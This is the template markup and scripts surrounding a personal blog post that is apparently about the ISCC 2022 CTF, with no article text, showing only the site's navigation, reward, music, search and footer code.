            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://BvxiE.github.io/2022/06/11/ISCC%202022/">http://BvxiE.github.io/2022/06/11/ISCC%202022/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">BvxiE</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">No tag</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2022/06/14/PHP%E7%AC%94%E8%AE%B0%2026%2027/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/5.jpg" class="responsive-img" alt="PHP笔记 26 27">
                        
                        <span class="card-title">PHP笔记 26 27</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-06-14
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            BvxiE
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/03/25/ctf.show_VIP%E9%A2%98%E7%9B%AE%E9%99%90%E5%85%8D(%E5%85%A8)/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/16.jpg" class="responsive-img" alt="VIP题目限免">
                        
                        <span class="card-title">VIP题目限免</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-03-25
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            BvxiE
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <a href="/about" target="_blank">BvxiE</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;Total visits:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;Total visitors:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/blinkfox" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1337198618@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1337198618" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1337198618" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
